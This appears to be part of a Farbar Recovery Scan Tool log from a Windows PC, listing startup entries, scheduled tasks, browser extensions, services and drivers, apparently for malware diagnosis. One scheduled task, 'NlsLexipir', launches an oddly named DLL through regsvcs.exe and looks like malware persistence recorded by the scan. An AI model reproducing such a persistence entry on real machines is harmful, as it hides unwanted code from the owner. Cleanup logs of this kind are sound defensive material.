(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe <2>
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe <3>
(Node.js Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2>
(Qualcomm Atheros -> Windows ® Win 7 DDK provider) C:\Windows\System32\AdminService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [602968 2015-12-07] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] (Fortemedia Inc -> )
HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849920 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1831768 2016-08-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412680 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [USB Security] => C:\Program Files (x86)\USB Disk Security\USBGuard.exe [695528 2015-01-31] (Lanzhou Itanium Software Technology Co., Ltd. -> Zbshareware Lab)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-07-30] (Adobe Inc. -> )
HKLM-x32\...\Run: [TeamsMachineInstaller] => C:\Program Files (x86)\Teams Installer\Teams.exe [114671912 2021-02-10] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [BitTorrent] => C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe [2135080 2021-03-25] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\root\Office16\lync.exe [26374984 2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\FRANCIS\AppData\Local\Microsoft\Teams\Update.exe [2452664 2020-12-10] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [com.squirrel.Teams.Teams] => C:\Users\PC Gamer Jones\AppData\Local\Microsoft\Teams\Update.exe --processStart "Teams.exe" --process-start-args "--system-initiated"
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [BitTorrent] => C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe [2135080 2021-03-25] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [Exetender] => "C:\Program Files (x86)\Free Ride Games\GPlayer.exe" /runonstartup
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\RunOnce: [DependencyCheck] => Performed
Startup: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GenuineService.lnk [2019-08-09]
ShortcutTarget: GenuineService.lnk -> C:\Users\FRANCIS\Autodesk\Genuine Service\GenuineService.exe (Autodesk, Inc. -> Autodesk)
Startup: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2021-04-08]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {030D016F-C42A-4638-8891-3F3AD473EC60} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [141144 2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {06CECE40-6FA4-4D81-9806-5215ACA506EC} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23103392 2021-04-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {1799BC3D-AF55-4040-97AA-B6746FAAFB67} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {1DB835C3-2613-4254-88FD-E2BCCD03CED9} - System32\Tasks\McInstruTrack => C:\ProgramData\McAfee\McInstruTrack\McInstruTrack.exe [775360 2020-12-15] (McAfee, LLC. -> McAfee, LLC.)
Task: {2265CEEA-A032-4BDF-93EA-F29054F3DE5C} - System32\Tasks\McAfee\McAfee DAT Built in test => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe [1889696 2021-04-28] (McAfee, Inc. -> McAfee, LLC.)
Task: {257132D5-DB23-4063-BC46-F6858F9477E3} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {261B4330-E64A-44CC-8530-3D8BDD56EF74} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [995848 2021-03-29] (McAfee, LLC -> McAfee, LLC)
Task: {33517268-D16F-47DC-8C91-E259FE340A49} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3C12DCA7-5046-47AA-AD6B-04B33D166576} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {466EBA7D-08E1-468E-92F3-C295C9758910} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905584 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {48D9B3B6-4450-487D-A4D0-EE744CDCA45B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5229504 2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {490721B9-A199-4631-B59B-12050CB6CB5F} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [874472 2020-09-29] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {6320F9EA-93EA-4A88-990D-32413D851D71} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [62392 2021-03-14] (Lenovo -> Lenovo Group Ltd.)
Task: {637782C4-306B-4960-9A86-CB4EDC830D3E} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe [4630104 2021-02-03] (McAfee, LLC -> McAfee, LLC)
Task: {642F9BCA-62E6-4423-AE6F-17028198A2D9} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6670CD9E-0E7D-4947-9D64-60839CE52340} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23103392 2021-04-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {6B183E82-1785-4DE7-821C-E43992C810C3} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {70E7D95C-F343-4480-8444-15E0F8965F4C} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler  /v start /t reg_dword /d 1 /f /reg:32
Task: {71643631-02C0-454A-94E7-2E21E49D1E8A} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.102\DADUpdater.exe [4114728 2021-04-26] (McAfee, LLC -> McAfee, LLC)
Task: {7AF1B6B9-494A-4503-B5CF-3AB48BC7D2C4} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [143888 2021-03-02] (Lenovo -> Lenovo Group Ltd.)
Task: {7E2969D5-A5A7-4250-A26F-21D4EB53A6EC} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [995848 2021-03-29] (McAfee, LLC -> McAfee, LLC)
Task: {82F7335F-144E-45F8-8E0A-FB23AA76AC60} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-04-30] (Avast Software s.r.o. -> Avast Software)
Task: {8A1F08FE-1A68-4EDA-846F-136862319E8B} - System32\Tasks\MATLAB R2019b Startup Accelerator => C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe [53248 2019-07-19] () [File not signed]
Task: {8EF0C3D4-9F36-4C5A-B40F-9ED049FEBD76} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\59b8c9d3-b395-4eb2-8edc-6e897f84c883 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.)
Task: {901DC0CF-2F8E-4997-9EDF-E6D41C130D8A} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905584 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {91E13CB6-EBE8-44AB-9331-14D7A32E45A7} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\39a63f2d-0daf-4b9b-a96d-bc584b800309 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.)
Task: {93BD2383-BEA9-47CC-9D6C-EEE5A3501F2C} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758224 2021-02-22] (Lenovo -> )
Task: {9E5D1EA3-A99B-4D01-B17C-A4732318731E} - System32\Tasks\Microsoft\NlsLexipir => C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe "C:\Program Files (x86)\Common Files\NotesDriver\ClyentrAgent\SETwm_2x80.dll"
Task: {A3A4E228-8FE6-4395-8B08-E98D22A50764} - System32\Tasks\Lenovo\Lenovo Service Bridge\S-1-5-21-3936790745-3440936247-791344644-1001 => C:\Users\FRANCIS\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe [87848 2021-05-03] (Lenovo (Beijing) Limited -> Lenovo Group Limited)
Task: {B142D6B6-D6C6-4804-9BA9-92A856ADF9F3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.)
Task: {BB90F46A-CD76-4EEA-A3F9-8BC323B4FD3A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C44E6E04-62B1-4B13-9759-2FF67153F57D} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3336560 2021-04-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {C9BB156E-B929-493E-9E5D-2743713C9B37} - System32\Tasks\Microsoft\Office\Office Serviceability Manager => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\officesvcmgr.exe [4071016 2021-04-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {D238A51C-A36E-4720-AE7B-2697714881C7} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [740760 2021-03-31] (McAfee, LLC -> McAfee, LLC)
Task: {D72A7211-88AD-4D37-AD44-D1A374E9A11A} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {DA539217-6EA6-4242-8857-3ACB67528549} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [141144 2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {DC68A6EB-3D9A-40BD-81B8-A8C2AC8E31E3} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService
Task: {E08158BD-7182-439B-89FB-AD55823E9894} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758224 2021-02-22] (Lenovo -> )
Task: {E0C41DCC-6827-4AFF-9AAA-28525F7C268E} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [874472 2020-09-29] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {E3424804-21BB-417A-984C-D46CE18CA2BA} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\e4e6c1f8-eed0-466c-8078-a92c0fd7e85a => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.)
Task: {E77F4ED0-6284-4289-AF0B-A7E350FB4A86} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\d0bc3793-ac32-4e9f-9c52-27f20cb62f47 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.)
Task: {E888FAEB-9001-4367-BAB5-DFB95CCD3217} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5229504 2021-05-02] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\MATLAB R2019b Startup Accelerator.job => C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.15.1
Tcpip\..\Interfaces\{204a6e4f-bb21-4465-afa7-eb9d10065002}: [DhcpNameServer] 192.168.15.1
Tcpip\..\Interfaces\{29e88bd8-7886-4ff5-af4c-24b71a9c5f1d}: [DhcpNameServer] 192.168.15.1

Edge:
=======
DownloadDir: C:\Users\FRANCIS\Downloads
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default [2021-05-07]
Edge DownloadDir: C:\Users\FRANCIS\Downloads
Edge Session Restore: Default -> is enabled.
Edge Extension: (Outlook) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-10-20]
Edge Extension: (Hotspot Shield Free VPN Proxy - Unlimited VPN) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cdbkakmeogejmlpgioplhjkaablahbmj [2021-02-18]
Edge Extension: (Grammarly for Microsoft Edge) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cnlefmmeadmemmdciolhbnfeacpdfbkd [2021-05-06]
Edge Extension: (Adblock Plus - free ad blocker) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gmgoamodcdcjnbaobigkjelfplakmdhh [2021-02-19]
Edge Extension: (Word) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-10-20]
Edge Extension: (Malwarebytes Browser Guard) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2021-05-06]
Edge Extension: (Momentum) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jdoanlopeanabgejgmdncljhkdplcfed [2021-05-06]
Edge Extension: (Excel) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-10-20]
Edge Extension: (PowerPoint) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-10-20]
Edge Extension: (Mapua Enrollment Bot) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\pboendiadmllnchnkaooickindpppinl [2021-02-18]
Edge HKLM-x32\...\Edge\Extension: [ihcjicgdanjaechkgeegckofjjedodee]

FireFox:
========
FF DefaultProfile: gwnyf9lv.default
FF ProfilePath: C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\gwnyf9lv.default [2021-03-30]
FF ProfilePath: C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\6ew9mwxv.default-release [2021-05-04]
FF Extension: (Greasemonkey) - C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\6ew9mwxv.default-release\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2021-03-30]
FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSKHKLM => not found
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK
FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2021-04-28] [Legacy] [not signed]
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2021-03-31] (McAfee, LLC -> )
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2021-03-31] (McAfee, LLC -> )
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2021-04-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-04-21] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3780296 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3548360 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8798600 2021-04-21] (Microsoft Corporation -> Microsoft Corporation)
R2 CxUtilSvc; C:\Program Files\Conexant\SAII\CxUtilSvc.exe [132096 2016-05-12] (Conexant Systems, Inc.) [File not signed]
S2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
S3 FvSvc; C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe [409456 2021-03-30] (NVIDIA Corporation -> NVIDIA)
R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7391408 2021-05-06] (Malwarebytes Inc -> Malwarebytes)
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971976 2021-04-30] (McAfee, LLC -> McAfee, LLC)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_20_12\McApExe.exe [780032 2021-03-31] (McAfee, LLC -> McAfee, LLC)
S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [583344 2020-11-03] (McAfee, LLC -> McAfee, LLC)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\4.1.106.0\\McCSPServiceHost.exe [2787160 2021-03-29] (McAfee, LLC -> McAfee, LLC)
S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC)
R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1631736 2021-03-29] (McAfee, LLC -> McAfee, LLC)
S3 OfficeSvcManagerAddons; C:\WINDOWS\system32\dllhost.exe /Processid:{2CA2E202-932F-4BA2-8771-195BB86398F5} [21312 2020-10-16] (Microsoft Windows -> Microsoft Corporation)
R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [4241112 2021-03-29] (McAfee, LLC -> McAfee, LLC)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\NisSrv.exe [2624104 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MsMpEng.exe [128376 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [75712 2020-12-11] (McAfee, Inc. -> McAfee, LLC)
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [218960 2020-05-26] (McAfee, LLC -> McAfee, Inc.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220752 2021-05-06] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2021-05-06] (Malwarebytes Inc -> Malwarebytes)
R2 McPvDrv; C:\WINDOWS\system32\drivers\McPvDrv.sys [89112 2021-01-18] (McAfee, LLC -> McAfee, LLC)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [544704 2020-12-11] (McAfee, Inc. -> McAfee, LLC)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [385984 2020-12-11] (McAfee, Inc. -> McAfee, LLC)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85944 2020-12-11] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [522176 2020-12-11] (McAfee, Inc. -> McAfee, LLC)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [1027520 2020-12-11] (McAfee, Inc. -> McAfee, LLC)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [608192 2020-12-17] (McAfee, Inc. -> McAfee LLC.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [107968 2020-12-17] (McAfee, Inc. -> McAfee LLC.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [116672 2020-12-11] (McAfee, Inc. -> McAfee, LLC)
